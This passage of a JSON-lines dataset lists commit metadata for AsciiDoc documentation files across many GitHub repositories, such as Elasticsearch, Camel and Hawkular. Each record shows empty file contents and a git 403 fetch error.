arch,lzo\/elasticsearch-1,mbrukman\/elasticsearch,schonfeld\/elasticsearch,strapdata\/elassandra-test,Fsero\/elasticsearch,kaneshin\/elasticsearch,a2lin\/elasticsearch,mute\/elasticsearch,PhaedrusTheGreek\/elasticsearch,kenshin233\/elasticsearch,sreeramjayan\/elasticsearch,tahaemin\/elasticsearch,lightslife\/elasticsearch,humandb\/elasticsearch,kevinkluge\/elasticsearch,ouyangkongtong\/elasticsearch,wbowling\/elasticsearch,szroland\/elasticsearch,kenshin233\/elasticsearch,sposam\/elasticsearch,vvcephei\/elasticsearch,SergVro\/elasticsearch,iamjakob\/elasticsearch,mute\/elasticsearch,sauravmondallive\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,javachengwc\/elasticsearch,kcompher\/elasticsearch,tkssharma\/elasticsearch,humandb\/elasticsearch,vingupta3\/elasticsearch,avikurapati\/elasticsearch,LewayneNaidoo\/elasticsearch,MjAbuz\/elasticsearch,khiraiwa\/elasticsearch,JackyMai\/elasticsearch,Asimov4\/elasticsearch,Liziyao\/elasticsearch,AndreKR\/elasticsearch,Widen\/elasticsearch,zkidkid\/elasticsearch,i-am-Nathan\/elasticsearch,HarishAtGitHub\/elasticsearch,TonyChai24\/ESSource,18098924759\/elasticsearch,shreejay\/elasticsearch,EasonYi\/elasticsearch,kunallimaye\/elasticsearch,SergVro\/elasticsearch,karthikjaps\/elasticsearch,zhiqinghuang\/elasticsearch,achow\/elasticsearch,pritishppai\/elasticsearch,khiraiwa\/elasticsearch,Kakakakakku\/elasticsearch,abibell\/elasticsearch,vrkansagara\/elasticsearch,Kakakakakku\/elasticsearch,wayeast\/elasticsearch,pozhidaevak\/elasticsearch,elasticdog\/elasticsearch,aglne\/elasticsearch,pritishppai\/elasticsearch,gmarz\/elasticsearch,nellicus\/elasticsearch,caengcjd\/elasticsearch,vrkansagara\/elasticsearch,rmuir\/elasticsearch,kkirsche\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,ImpressTV\/elasticsearch,Kakakakakku\/elasticsearch,wenpos\/elasticsearch,jeteve\/elasticsearch,jimczi\/elasticsearch,alexbrasetvik\/elasticsearch,NBSW\/elasticsearch,phani546\/elasticsearch,areek\/elasticsearch,Brijeshrpatel9\/elasticsearch,huanzhong\/elasticsearch,ydsakyclguozi\/elasticsearch,wittyameta\/elasticsearch,acchen97\/elasticsearch,episerver\/elasticsearch,ImpressTV\/elasticsearch,himanshuag\/elasticsearch,kimimj\/elasticsearch,hanswang\/elasticsearch,Siddartha07\/elasticsearch,infusionsoft\/elasticsearch,i-am-Nathan\/elasticsearch,kingaj\/elasticsearch,wenpos\/elasticsearch,koxa29\/elasticsearch,
KimTaehee\/elasticsearch,kingaj\/elasticsearch,davidvgalbraith\/elasticsearch,alexshadow007\/elasticsearch,MjAbuz\/elasticsearch,vietlq\/elasticsearch,Charlesdong\/elasticsearch,jchampion\/elasticsearch,golubev\/elasticsearch,markllama\/elasticsearch,Asimov4\/elasticsearch,onegambler\/elasticsearch,wenpos\/elasticsearch,cnfire\/elasticsearch-1,jsgao0\/elasticsearch,truemped\/elasticsearch,Kakakakakku\/elasticsearch,markllama\/elasticsearch,petabytedata\/elasticsearch,markllama\/elasticsearch,tsohil\/elasticsearch,khiraiwa\/elasticsearch,Microsoft\/elasticsearch,dongjoon-hyun\/elasticsearch,EasonYi\/elasticsearch,queirozfcom\/elasticsearch,Chhunlong\/elasticsearch,beiske\/elasticsearch,jchampion\/elasticsearch,wayeast\/elasticsearch,scorpionvicky\/elasticsearch,pablocastro\/elasticsearch,infusionsoft\/elasticsearch,fernandozhu\/elasticsearch,MaineC\/elasticsearch,sdauletau\/elasticsearch,ckclark\/elasticsearch,iantruslove\/elasticsearch,koxa29\/elasticsearch,lmtwga\/elasticsearch,lzo\/elasticsearch-1,anti-social\/elasticsearch,winstonewert\/elasticsearch,Shepard1212\/elasticsearch,mnylen\/elasticsearch,ThalaivaStars\/OrgRepo1,zeroctu\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mrorii\/elasticsearch,karthikjaps\/elasticsearch,cwurm\/elasticsearch,yynil\/elasticsearch,humandb\/elasticsearch,camilojd\/elasticsearch,ulkas\/elasticsearch,geidies\/elasticsearch,StefanGor\/elasticsearch,jpountz\/elasticsearch,golubev\/elasticsearch,knight1128\/elasticsearch,nazarewk\/elasticsearch,amaliujia\/elasticsearch,davidvgalbraith\/elasticsearch,Flipkart\/elasticsearch,dylan8902\/elasticsearch,andrestc\/elasticsearch,chirilo\/elasticsearch,apepper\/elasticsearch,brandonkearby\/elasticsearch,kaneshin\/elasticsearch,uschindler\/elasticsearch,wimvds\/elasticsearch,coding0011\/elasticsearch,truemped\/elasticsearch,Collaborne\/elasticsearch,rajanm\/elasticsearch,maddin2016\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nilabhsagar\/elasticsearch,elasticdog\/elasticsearch,nellicus\/elasticsearch,socialrank\/elasticsearch,springning\/elasticsearch,mortonsykes\/elasticsearch,rlugojr\/elasticsearch,Flipkart\/elasticsearch,mute\/elasticsearch,feiqitian\/elasticsearch,yanjunh\/elasticsearch,nilabhsagar\/elasticsearch,lightslife\/elasticsearch,hechunwen\/elasticsearch,Rygbee\/elasticsearch,kimimj\/elasticsearch,pranavraman\/elasticsearch,gmarz\/elasticsearch,springning\/elasticsearch,ImpressTV\/elasticsearch,hirdesh2008\/elasticsearch,mbrukman\/elasticsearch,zhiqinghuang\/elasticsearch,diendt\/elasticsearch,andrejserafim\/elasticsearch,Widen\/elasticsearch,iacdingping\/elasticsearch,mbrukman\/elasticsearch,scottsom\/elasticsearch,weipinghe\/elasticsearch,hafkensite\/elasticsearch,coding0011\/elasticsearch,alexshadow007\/elasticsearch,clintongormley\/elasticsearch,geidies\/elasticsearch,kubum\/elasticsearch,pranavraman\/elasticsearch,Kakakakakku\/elasticsearch,njlawton\/elasticsearch,mkis-\/elasticsearch,bestwpw\/elasticsearch,geidies\/elasticsearch,masterweb121\/elasticsearch,Clairebi\/ElasticsearchClone,karthikjaps\/elasticsearch,Uiho\/elasticsearch,sjohnr\/elasticsearch,fforbeck\/elasticsearch,alexkuk\/elasticsearch,StefanGor\/elasticsearch,Widen\/elasticsearch,palecur\/elasticsearch,mjason3\/elasticsearch,lchennup\/elasticsearch,ouyangkongtong\/elasticsearch,ckclark\/elasticsearch,smflorentino\/elasticsearch,yongminxia\/elasticsearch,polyfractal\/elasticsearch,milodky\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,jeteve\/elasticsearch,tebriel\/elasticsearch,naveenhooda2000\/elasticsearch,Clairebi\/Elastic
searchClone,baishuo\/elasticsearch_v2.1.0-baishuo,Chhunlong\/elasticsearch,lks21c\/elasticsearch,LeoYao\/elasticsearch,hanswang\/elasticsearch,Collaborne\/elasticsearch,drewr\/elasticsearch,hanswang\/elasticsearch,awislowski\/elasticsearch,qwerty4030\/elasticsearch,jimczi\/elasticsearch,jango2015\/elasticsearch,ivansun1010\/elasticsearch,feiqitian\/elasticsearch,springning\/elasticsearch,vroyer\/elassandra,onegambler\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,artnowo\/elasticsearch,alexbrasetvik\/elasticsearch,kalburgimanjunath\/elasticsearch","old_file":"docs\/reference\/analysis\/analyzers\/standard-analyzer.asciidoc","new_file":"docs\/reference\/analysis\/analyzers\/standard-analyzer.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"580775423a8d6f9951e7633450f35dda4686de7f","subject":"Retroactive post about Hawkular Metrics 0.6.0 release.","message":"Retroactive post about Hawkular Metrics 0.6.0 release.\n","repos":"jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/08\/29\/hawkular-metrics-0.6.0.Final-released.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/08\/29\/hawkular-metrics-0.6.0.Final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c824c18bc0e423e5b55d227327d804c9a9e52194","subject":"Update 2017-06-11-vimmer1.adoc","message":"Update 2017-06-11-vimmer1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-11-vimmer1.adoc","new_file":"_posts\/2017-06-11-vimmer1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"51753eb4ca2d2717a2bb58b2e0462db7f727ee41","subject":"Update 2017-07-04-Azure-5.adoc","message":"Update 
2017-07-04-Azure-5.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-04-Azure-5.adoc","new_file":"_posts\/2017-07-04-Azure-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39dfa5fe7363cd1729e7a9e1e19401b498bb7784","subject":"Migrating old release notes: 2.17.1 release notes","message":"Migrating old release notes: 2.17.1 release notes\n","repos":"sverkera\/camel,cunningt\/camel,apache\/camel,ullgren\/camel,pax95\/camel,tdiesler\/camel,sverkera\/camel,pax95\/camel,anoordover\/camel,sverkera\/camel,kevinearls\/camel,davidkarlsen\/camel,nicolaferraro\/camel,nikhilvibhav\/camel,zregvart\/camel,objectiser\/camel,CodeSmell\/camel,tdiesler\/camel,tadayosi\/camel,onders86\/camel,kevinearls\/camel,alvinkwekel\/camel,kevinearls\/camel,nikhilvibhav\/camel,DariusX\/camel,gnodet\/camel,alvinkwekel\/camel,christophd\/camel,onders86\/camel,DariusX\/camel,cunningt\/camel,gnodet\/camel,ullgren\/camel,pax95\/camel,adessaigne\/camel,christophd\/camel,davidkarlsen\/camel,sverkera\/camel,alvinkwekel\/camel,adessaigne\/camel,anoordover\/camel,christophd\/camel,tdiesler\/camel,tadayosi\/camel,pmoerenhout\/camel,mcollovati\/camel,tdiesler\/camel,nicolaferraro\/camel,pmoerenhout\/camel,CodeSmell\/camel,cunningt\/camel,punkhorn\/camel-upstream,Fabryprog\/camel,pax95\/camel,punkhorn\/camel-upstream,pmoerenhout\/camel,tadayosi\/camel,jamesnetherton\/camel,sverkera\/camel,adessaigne\/camel,apache\/camel,ullgren\/camel,Fabryprog\/camel,jamesnetherton\/camel,kevinearls\/camel,Fabryprog\/camel,jamesnetherton\/camel,tadayosi\/camel,mcollovati\/camel,gnodet\/camel,nicolaferraro\/camel,DariusX\/camel,objectiser\/camel,mcollovati\/camel,adessaigne\/camel,anoordover\/camel,zregvart\/camel,pax95\/camel,zregvart\/camel,davidkarlsen\/camel,cunningt\/camel,cunningt\/camel,jamesnetherton\/camel,tadayosi\/camel,anoordover\/camel,pax95\/camel,nikhilvibhav\/camel,davidkarlsen\/camel,pmoerenhout\/camel,onders86\/camel,anoordover\/camel,adessaigne\/camel,Fabryprog\/camel,christophd\/camel,zregvart\/camel,objectiser\/camel,onders86\/camel,nikhilvibhav\/camel,jamesnetherton\/camel,apache\/camel,apache\/camel,CodeSmell\/camel,tadayosi\/camel,ullgren\/camel,christophd\/camel,DariusX\/camel,anoordover\/camel,pmoerenhout\/camel,tdiesler\/camel,jamesnetherton\/camel,apache\/camel,onders86\/camel,punkhorn\/camel-upstream,gnodet\/camel,kevinearls\/camel,CodeSmell\/camel,sverkera\/camel,apache\/camel,punkhorn\/camel-upstream,adessaigne\/camel,mcollovati\/camel,gnodet\/camel,tdiesler\/camel,christophd\/camel,nicolaferraro\/camel,cunningt\/camel,objectiser\/camel,onders86\/camel,kevinearls\/camel,pmoerenhout\/camel,alvinkwekel\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2171-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2171-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7bc74cb3d90bbd418c9d85ae3556f64704d8c47d","subject":"Add documentation for compression support.","message":"Add documentation for compression 
support.\n","repos":"GetAmbassador\/django-redis,lucius-feng\/django-redis,zl352773277\/django-redis,smahs\/django-redis,yanheng\/django-redis","old_file":"doc\/content.adoc","new_file":"doc\/content.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yanheng\/django-redis.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"eda682d22b47144448b716c3e5bf4ebb7baa009a","subject":"Add first draft of EDA API documentation","message":"Add first draft of EDA API documentation\n","repos":"olofk\/fusesoc,lowRISC\/fusesoc,olofk\/fusesoc,lowRISC\/fusesoc","old_file":"doc\/eda_api.adoc","new_file":"doc\/eda_api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/olofk\/fusesoc.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"f62b01cdf08c65c572eef47c010ca6975d30d97e","subject":"y2b create post Did Apple Just Cancel The iPhone X?","message":"y2b create post Did Apple Just Cancel The iPhone X?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-24-Did-Apple-Just-Cancel-The-iPhone-X.adoc","new_file":"_posts\/2018-01-24-Did-Apple-Just-Cancel-The-iPhone-X.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"54475bcb7b57db41147bb84626e0e06cd1cfb05f","subject":"Update 2016-01-16-APIs-and-why-Tech-Writers-need-to-know-about-them.adoc","message":"Update 2016-01-16-APIs-and-why-Tech-Writers-need-to-know-about-them.adoc","repos":"jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog","old_file":"_posts\/2016-01-16-APIs-and-why-Tech-Writers-need-to-know-about-them.adoc","new_file":"_posts\/2016-01-16-APIs-and-why-Tech-Writers-need-to-know-about-them.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"92d741a832d49d64cdcedcce22f007fcbf967828","subject":"Update 2019-11-23-oyl.adoc","message":"Update 2019-11-23-oyl.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-11-23-oyl.adoc","new_file":"_posts\/2019-11-23-oyl.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b3ae419c2813190d3622d067c59519d71156e42","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 
2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7cd134a0d70d34fdf0347634c2bf80716eaf3515","subject":"Update 2016-07-20-vim.adoc","message":"Update 2016-07-20-vim.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-20-vim.adoc","new_file":"_posts\/2016-07-20-vim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c383d7c67fdc4a3559244e092b9111e3039a1545","subject":"First Pass at ONCALL Template","message":"First Pass at ONCALL Template\n","repos":"lookout\/styleguides","old_file":"docs\/ONCALL.adoc","new_file":"docs\/ONCALL.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lookout\/styleguides.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2881d58d2bd7a2c891f6dccf41754e343f40d34c","subject":"Update doc sections. Add model initial doc","message":"Update doc sections. Add model initial doc\n","repos":"mulesoft\/mule-cookbook","old_file":"model\/README.adoc","new_file":"model\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mulesoft\/mule-cookbook.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e79872c3988be6bb5c1efcc4671167868d292943","subject":"y2b create post Beats By Dr Dre Beats Studio Unboxing - Blue (Colors)","message":"y2b create post Beats By Dr Dre Beats Studio Unboxing - Blue (Colors)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-10-31-Beats-By-Dr-Dre-Beats-Studio-Unboxing--Blue-Colors.adoc","new_file":"_posts\/2011-10-31-Beats-By-Dr-Dre-Beats-Studio-Unboxing--Blue-Colors.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52f921a471748cfb73f9c62b1855f63973c4e8e5","subject":"Update 2017-04-21-Creating-a-new-project-nativescript-with-angular-2.adoc","message":"Update 2017-04-21-Creating-a-new-project-nativescript-with-angular-2.adoc","repos":"NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io","old_file":"_posts\/2017-04-21-Creating-a-new-project-nativescript-with-angular-2.adoc","new_file":"_posts\/2017-04-21-Creating-a-new-project-nativescript-with-angular-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/NativeScriptBrasil\/nativescriptbrasil.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf5a9afe0a027615c3dc77426ebadb592080aa3b","subject":"Update 2013-11-11-to-delete.adoc","message":"Update 2013-11-11-to-delete.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2013-11-11-to-delete.adoc","new_file":"_posts\/2013-11-11-to-delete.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63ea64339bc08772acfe9f4e748b107a23447b6c","subject":"201801221857","message":"201801221857\n","repos":"bradyhouse\/house,bradyhouse\/house,bradyhouse\/house,bradyhouse\/house,bradyhouse\/house,bradyhouse\/house,bradyhouse\/house,bradyhouse\/house,bradyhouse\/house","old_file":"fiddles\/aws\/readme.adoc","new_file":"fiddles\/aws\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bradyhouse\/house.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c14f9aaf50c3e59826b56ac55f5524dd4218a64","subject":"job: #11931 Introducing analysis note for ASL types import and export.","message":"job: #11931 Introducing analysis note for ASL types import and export.\n","repos":"lwriemen\/mc,lwriemen\/mc,lwriemen\/mc,cortlandstarrett\/mc,cortlandstarrett\/mc,lwriemen\/mc,leviathan747\/mc,leviathan747\/mc,cortlandstarrett\/mc,rmulvey\/mc,lwriemen\/mc,leviathan747\/mc,xtuml\/mc,cortlandstarrett\/mc,leviathan747\/mc,xtuml\/mc,rmulvey\/mc,xtuml\/mc,xtuml\/mc,cortlandstarrett\/mc,rmulvey\/mc,cortlandstarrett\/mc,lwriemen\/mc,rmulvey\/mc,xtuml\/mc,rmulvey\/mc,leviathan747\/mc,rmulvey\/mc,xtuml\/mc,leviathan747\/mc","old_file":"doc\/notes\/11444_wasl\/11931_types_ant.adoc","new_file":"doc\/notes\/11444_wasl\/11931_types_ant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/leviathan747\/mc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dd2375a7556a959352ba06ba548d2cde11043c4b","subject":"Update 2017-05-28-Network-construction.adoc","message":"Update 2017-05-28-Network-construction.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-28-Network-construction.adoc","new_file":"_posts\/2017-05-28-Network-construction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"90a843fdbb84a53c3afb59db5e1beb2a69dbe703","subject":"Fixed errors","message":"Fixed errors\n","repos":"smoope\/java-sdk","old_file":"src\/main\/resources\/docs\/sdk-reference.adoc","new_file":"src\/main\/resources\/docs\/sdk-reference.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smoope\/java-sdk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"11b57b574565af1077fb842508303ca1e501666d","subject":"Update 2016-11-11-Pepper.adoc","message":"Update 
2016-11-11-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-11-Pepper.adoc","new_file":"_posts\/2016-11-11-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d37f0bd8c7ee5d48b3d50709d8b18fa184e07a8","subject":"Create chapta_deeper_chaptadeeper_chapta2__deeper_chapta3.adoc","message":"Create chapta_deeper_chaptadeeper_chapta2__deeper_chapta3.adoc","repos":"JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook","old_file":"chapta_deeper_chaptadeeper_chapta2__deeper_chapta3.adoc","new_file":"chapta_deeper_chaptadeeper_chapta2__deeper_chapta3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JClingo\/gitbook.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"88a89cc311825802f0f3b809be32db8511c4c44a","subject":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","message":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"30b326a28deeffc7f03b82d135a4e0e942e1608b","subject":"Update 2018-06-27-Running-cockpit-on-a-Satellite-Capsule-Foreman-Proxy.adoc","message":"Update 2018-06-27-Running-cockpit-on-a-Satellite-Capsule-Foreman-Proxy.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2018-06-27-Running-cockpit-on-a-Satellite-Capsule-Foreman-Proxy.adoc","new_file":"_posts\/2018-06-27-Running-cockpit-on-a-Satellite-Capsule-Foreman-Proxy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0a8177e7b2dd4e949afc8544db63aba2c0d65d7","subject":"Create README.adoc","message":"Create README.adoc","repos":"lefou\/LambdaTest,lefou\/LambdaTest,lefou\/poor-mans-lambda-test,lefou\/poor-mans-lambda-test","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lefou\/poor-mans-lambda-test.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"196db4e795a88a40ab4b237708c7b6802e01d813","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"991fbe07e1a47a182023cd9522016775c67a6e0d","subject":"app.asciidoc: Document how to handle generated source files","message":"app.asciidoc: Document how to handle generated source files\n","repos":"rabbitmq\/erlang.mk,nevar\/erlang.mk,jj1bdx\/erlang.mk,KrzysiekJ\/erlang.mk,bsmr-erlang\/erlang.mk,a12n\/erlang.mk,hairyhum\/erlang.mk,ninenines\/erlang.mk,ingwinlu\/erlang.mk,crownedgrouse\/erlang.mk","old_file":"doc\/src\/guide\/app.asciidoc","new_file":"doc\/src\/guide\/app.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crownedgrouse\/erlang.mk.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"298360cf02a7d744ee170858eda45d8391c7efa1","subject":"Create main.adoc","message":"Create main.adoc","repos":"jauco\/asciidoctorbug","old_file":"main.adoc","new_file":"main.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jauco\/asciidoctorbug.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f349828f6db6abeaa0822a00a588b43eae898c80","subject":"Update 2017-05-30-Test.adoc","message":"Update 2017-05-30-Test.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-05-30-Test.adoc","new_file":"_posts\/2017-05-30-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b50813f881cac2f6b1051a9112e249b34f81500","subject":"Update 